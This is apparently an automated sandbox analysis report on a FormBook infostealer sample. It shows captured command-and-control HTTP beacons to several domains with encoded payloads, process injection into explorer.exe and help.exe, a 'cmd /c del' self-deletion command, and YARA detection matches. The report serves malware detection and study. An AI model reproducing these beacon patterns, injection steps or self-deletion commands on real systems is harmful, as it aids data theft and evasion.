                                                        Jun 10, 2021 17:59:28.103904963 CEST3676INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                        Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                        Jun 10, 2021 17:59:28.103924990 CEST3678INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                        Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                        Jun 10, 2021 17:59:28.103945971 CEST3679INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                        Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                        Jun 10, 2021 17:59:28.103964090 CEST3680INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                        Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                        Jun 10, 2021 17:59:28.238409042 CEST3682INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                        Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.44976778.31.67.9180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:33.260176897 CEST3727OUTGET /p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.cleanxcare.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:33.313033104 CEST3728INHTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Content-Length: 707
                                                        Date: Thu, 10 Jun 2021 15:59:33 GMT
                                                        Location: https://www.cleanxcare.com/p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        Vary: User-Agent
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.449768151.106.118.7580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:39.007769108 CEST3729OUTGET /p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.biztekno.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:41.822793961 CEST3730INHTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        x-powered-by: PHP/7.4.20
                                                        set-cookie: weather_location=unknown; expires=Sat, 10-Jul-2021 15:59:39 GMT; Max-Age=2591999; path=/
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        content-type: text/html; charset=UTF-8
                                                        x-redirect-by: WordPress
                                                        location: http://biztekno.com/p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp
                                                        x-litespeed-cache: miss
                                                        content-length: 0
                                                        date: Thu, 10 Jun 2021 15:59:41 GMT
                                                        server: LiteSpeed
                                                        vary: User-Agent


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.449769163.43.122.11980C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:45.423042059 CEST3732OUTGET /p2io/?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.69-1hn7uc.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:45.760066986 CEST3732INHTTP/1.1 302 Found
                                                        Date: Thu, 10 Jun 2021 15:59:44 GMT
                                                        Server: Apache/2.2.13 (Unix)
                                                        Location: http://www.69-1hn7uc.net/notfound?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&YluDM=Ofc4YV0pThsp
                                                        Content-Length: 314
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36 39 2d 31 68 6e 37 75 63 2e 6e 65 74 2f 6e 6f 74 66 6f 75 6e 64 3f 78 4e 36 78 3d 56 39 51 36 59 4e 45 73 6d 55 54 67 75 6e 31 78 36 6a 38 52 56 52 74 30 75 64 50 43 79 6b 4b 45 4e 2f 7a 4b 2b 49 39 2f 58 43 7a 65 4f 43 36 35 30 6f 33 6e 6f 58 51 68 62 64 52 46 78 50 55 6c 59 72 62 44 26 61 6d 70 3b 59 6c 75 44 4d 3d 4f 66 63 34 59 56 30 70 54 68 73 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.69-1hn7uc.net/notfound?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&amp;YluDM=Ofc4YV0pThsp">here</a>.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.449770104.21.65.780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:50.897965908 CEST3734OUTGET /p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.cyrilgraze.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:50.956264973 CEST3735INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 10 Jun 2021 15:59:50 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 10 Jun 2021 16:59:50 GMT
                                                        Location: https://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp
                                                        cf-request-id: 0a983fcc9400004a5cd3af6000000001
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=wxDs3yH1Q0jpz%2FQwU22N2J90efSFmemicGmwvxLuWvDu0xC%2B%2FvwdkRc7EMM122xuc%2FufIqiNWH%2Fbb7H8jCiF0PEAjzqwvcdeeWzg2jpurI0DOf6h6pBSRaK95iLDrAUd"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 65d3cf27582a4a5c-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.449771192.169.223.1380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:56.257801056 CEST3735OUTGET /p2io/?xN6x=r2GsjHfGgcaZI4XPmfqM84hqAY3LnZYXU2G/Xsttb0tqrt8DFa/RFFebhWMTMoil/lgU&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.centergolosinas.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:56.448759079 CEST3736INHTTP/1.1 302 Found
                                                        Connection: close
                                                        Pragma: no-cache
                                                        cache-control: no-cache
                                                        Location: /p2io/?xN6x=r2GsjHfGgcaZI4XPmfqM84hqAY3LnZYXU2G/Xsttb0tqrt8DFa/RFFebhWMTMoil/lgU&YluDM=Ofc4YV0pThsp


                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:17:57:55
                                                        Start date:10/06/2021
                                                        Path:C:\Users\user\Desktop\SKlGhwkzTi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\SKlGhwkzTi.exe'
                                                        Imagebase:0x940000
                                                        File size:782336 bytes
                                                        MD5 hash:8252E0BD8E579259CC18CEAE0C5C6D64
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:17:58:07
                                                        Start date:10/06/2021
                                                        Path:C:\Users\user\Desktop\SKlGhwkzTi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\SKlGhwkzTi.exe
                                                        Imagebase:0xe00000
                                                        File size:782336 bytes
                                                        MD5 hash:8252E0BD8E579259CC18CEAE0C5C6D64
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:17:58:09
                                                        Start date:10/06/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:17:58:45
                                                        Start date:10/06/2021
                                                        Path:C:\Windows\SysWOW64\help.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\help.exe
                                                        Imagebase:0xf90000
                                                        File size:10240 bytes
                                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        General

                                                        Start time:17:58:47
                                                        Start date:10/06/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe'
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:17:58:48
                                                        Start date:10/06/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Executed Functions

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.682125335.00000000052B0000.00000040.00000001.sdmp, Offset: 052B0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 896554c28ed9d350d497fb2cd9a0186454c5f07eea5e9ad2d8dc8d1809d69a8b
                                                          • Instruction ID: 8beeb7c1ee733e4a6dc2ec96b06f6ed538f762ee3a313a696727a80ed2be25a4
                                                          • Opcode Fuzzy Hash: 896554c28ed9d350d497fb2cd9a0186454c5f07eea5e9ad2d8dc8d1809d69a8b
                                                          • Instruction Fuzzy Hash: 41828C31A24109DFDB14CF68C584AEEBBFAFF88354F168559E41A9B2A1D7B0EC41CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.682125335.00000000052B0000.00000040.00000001.sdmp, Offset: 052B0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f8ba4e4ee14fee7bd6b46af8a5ca503734f69754496453d2eb4845d9506de5a6
                                                          • Instruction ID: 9a0e5b67d5025e9aeb1d6e060a152515795a568457b5ef76457998165b507834
                                                          • Opcode Fuzzy Hash: f8ba4e4ee14fee7bd6b46af8a5ca503734f69754496453d2eb4845d9506de5a6
                                                          • Instruction Fuzzy Hash: 42528F70A142058FDB18DF68C884BEEBBB6BF89344F158169E50ADB355DB70EC41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.682125335.00000000052B0000.00000040.00000001.sdmp, Offset: 052B0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b13a1702704422afbdd27a569011c03578c0f5ed210915d34369e239db6fec91
                                                          • Instruction ID: 45594d2e9163e48e36a62288cda97dc2a26193366fdf71a476d23d7576c60b35
                                                          • Opcode Fuzzy Hash: b13a1702704422afbdd27a569011c03578c0f5ed210915d34369e239db6fec91
                                                          • Instruction Fuzzy Hash: 88025B71A241099FEB14CF68C884BEDBBF6FF88344F158469E819AB261D7B1EC45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a59e38df84a81f76834e0ae828614aac42faa833e8341e926ee80e31fe72b0bd
                                                          • Instruction ID: b29eb9a5877a170890a12e9e6e0d43bb2b9723533ce5f90eccfeec1c279266b2
                                                          • Opcode Fuzzy Hash: a59e38df84a81f76834e0ae828614aac42faa833e8341e926ee80e31fe72b0bd
                                                          • Instruction Fuzzy Hash: 4C91AF35E003198FCB04DBA4D864ADEBBBAFF89304F158615E516AF3A4EB30A945CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.678937554.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3902db79a9e10238bb406d173e1194cf928d5269aa3cc0250e87b5f044c376f
                                                          • Instruction ID: c9fc52812b85bdbf656e8faa4422796d45b21a8fcc991e976c52594b5ac8f031
                                                          • Opcode Fuzzy Hash: c3902db79a9e10238bb406d173e1194cf928d5269aa3cc0250e87b5f044c376f
                                                          • Instruction Fuzzy Hash: 26818D35E103198FCB04DBE0D864ADEBBBAFF89304B158615E516AB7A4EB30B945CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25090367a647d449cf2ce89db88909d1325e545379b7fba555d4e819b42653d0
                                                          • Instruction ID: 391f7a855d1b3b5743e67d89c1c43da79eaf9d167dddd15cee36be17ce64d0dd
                                                          • Opcode Fuzzy Hash: 25090367a647d449cf2ce89db88909d1325e545379b7fba555d4e819b42653d0
                                                          • Instruction Fuzzy Hash: 1E113671D052588FDB158FA5D418BEDBBF1EB4E305F089469D419B3290CBB88A84CF68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.679196403.0000000002C30000.00000040.00000001.sdmp, Offset: 02C30000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd8690f30bca9fddbadfa2c100874dd5cf3a05d5bf6074b1fb45a2daf5e1b31e
                                                          • Instruction ID: 56cb1fdff7d7dfa471fd7e32126a25d1f29aabd751ed3e13c9c94752308926bf
                                                          • Opcode Fuzzy Hash: cd8690f30bca9fddbadfa2c100874dd5cf3a05d5bf6074b1fb45a2daf5e1b31e
